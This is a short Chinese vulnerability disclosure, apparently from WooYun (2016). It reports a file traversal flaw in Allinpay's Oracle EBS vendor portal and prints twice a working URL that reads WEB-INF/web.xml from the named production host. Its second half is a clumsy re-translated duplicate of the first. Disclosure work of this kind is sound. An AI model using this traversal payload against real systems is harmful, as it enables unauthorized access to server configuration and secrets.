通联支付某处文件遍历读取漏洞(Oracle ebs系统通用漏洞案例)

漏洞标题 通联支付某处文件遍历读取漏洞(Oracle ebs系统通用漏洞案例) 相关厂商 allinpay.com 漏洞作者 路人甲 提交时间 2016-06-21 18:10 公开时间 2016-0…

漏洞标题 通联支付某处文件遍历读漏洞(Oracle ebs系统常见漏洞案例) 相关制造商 Allinpay.com 漏洞作者 过路人 提交时间 2016-06-21 18: 10 公共时间 2016-06-29 10: 52 漏洞类型 任何文件遍历/下载 危险等级 在 自我评估等级 10 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 漏洞详细信息 地址:http://vendor.allinpay.com//OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/./WEB-INF/web.xml 利用oracle ebs系统的一般漏洞。 阅读WEB.XML文件

漏洞证明: 地址:http://vendor.allinpay.com//OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/./WEB-INF/web.xml 利用oracle ebs系统的一般漏洞。 阅读WEB.XML文件

修理计划: 版权声明:请注明出处。居民A @乌云